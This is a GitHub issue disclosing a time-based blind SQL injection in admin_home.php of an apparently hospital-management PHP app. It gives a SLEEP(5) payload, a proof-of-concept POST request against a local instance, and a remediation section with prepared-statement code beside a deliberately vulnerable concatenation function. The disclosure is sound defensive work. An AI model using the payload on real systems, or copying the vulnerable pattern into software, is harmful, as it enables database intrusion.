
SQL Injection vulnerability via multiple parameters in admin_home.php #3

Open
khanhchauminh opened this issue Nov 8, 2021 · 0 comments


KhanhCM (@khanhchauminh)

Version: 1.0

Vulnerable parameters

Staff Registration:

  • afullname
  • aemail
  • apassword

Doctor Registration:

  • dfullname
  • demail
  • dpassword
  • dSpecialist

Delete Clerks:

  • ClDelEmail

Delete Doctor:

  • DrDelEmail

Steps to reproduce

  1. Go to Staff Login page
  2. Login with User Type = Admin
  3. Input personal information in the form
  4. Click on the Register button
  5. Intercept the request and insert the payload into the parameter values.

Example payload:

' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a

Proof-of-concept

POST /admin_home.php HTTP/1.1
Host: 127.0.0.1:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1:8888/admin_home.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jb2naa6oef92cak3bcohm1dus1
Connection: close

afullname=staff1'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20'a'%3d'a&aemail=staff1%40example.com&apassword=password

Response in Burp Suite

[image: Burp Suite response to the request above]

Source code review

admin_home.php

[image: admin_home.php source excerpt]

library.php

Remediation

Validate input of all vulnerable parameters in admin_home.php.
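The remediation above is stated in one line; the following is an added example (not code from this project or from the reporter) of what it looks like in PHP for the parameters named in this report. It assumes a `staff` table with `fullname`, `email` and `password_hash` columns, a `doctor` table for the `DrDelEmail` handler, a mysqli connection, and placeholder credentials; the project's real schema is not visible in the report and may differ. The first function shows the string-concatenation pattern that makes a quote in `afullname` become part of the SQL; the rest show the corrected handling, where input shape is checked and every user-supplied value is bound as a prepared-statement parameter.

```php
<?php
// Added example, not the project's code. Assumed schema: staff(fullname, email,
// password_hash) and doctor(fullname, email, password_hash, specialist).
declare(strict_types=1);

// Vulnerable pattern (the class of bug the report describes): request values are
// concatenated into the SQL text, so a quote in afullname changes the query.
function register_staff_vulnerable(mysqli $db, array $post): bool
{
    $sql = "INSERT INTO staff (fullname, email, password_hash) VALUES ('"
        . $post['afullname'] . "', '" . $post['aemail'] . "', '"
        . password_hash($post['apassword'], PASSWORD_DEFAULT) . "')";
    return (bool) $db->query($sql);
}

// Hardened version: validate the shape of each field first, then bind values as
// parameters so the database never parses them as SQL.
function register_staff(mysqli $db, array $post): bool
{
    $fullname = trim((string) ($post['afullname'] ?? ''));
    $email    = trim((string) ($post['aemail'] ?? ''));
    $password = (string) ($post['apassword'] ?? '');

    if ($fullname === '' || mb_strlen($fullname) > 100) {
        return false;
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    if (strlen($password) < 8) {
        return false;
    }

    $stmt = $db->prepare(
        'INSERT INTO staff (fullname, email, password_hash) VALUES (?, ?, ?)'
    );
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt->bind_param('sss', $fullname, $email, $hash);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Same treatment for the delete handlers (ClDelEmail / DrDelEmail): the email is
// bound, never concatenated. A table name cannot be a bound parameter, so it is
// restricted to a fixed allow-list instead of being taken from the request.
function delete_by_email(mysqli $db, string $table, string $email): bool
{
    $allowed = ['staff' => 'staff', 'doctor' => 'doctor'];
    if (!isset($allowed[$table])) {
        return false;
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    $stmt = $db->prepare("DELETE FROM {$allowed[$table]} WHERE email = ?");
    $stmt->bind_param('s', $email);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Dispatch on the parameters listed in the report. Connection details are placeholders.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
    $db = new mysqli('127.0.0.1', 'app_user', 'PLACEHOLDER_PASSWORD', 'hospital');
    if (isset($_POST['afullname'])) {
        register_staff($db, $_POST);
    } elseif (isset($_POST['ClDelEmail'])) {
        delete_by_email($db, 'staff', (string) $_POST['ClDelEmail']);
    } elseif (isset($_POST['DrDelEmail'])) {
        delete_by_email($db, 'doctor', (string) $_POST['DrDelEmail']);
    }
}
```

Validation alone (rejecting quotes, length limits) is not the fix; the parameter binding is. The checks are there so that malformed data is refused early and with a clear reason, while the prepared statement guarantees that whatever survives validation is treated as data by MySQL. The same pattern applies to the doctor registration fields (`dfullname`, `demail`, `dpassword`, `dSpecialist`), with `dSpecialist` ideally checked against the application's own list of specialities before binding.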
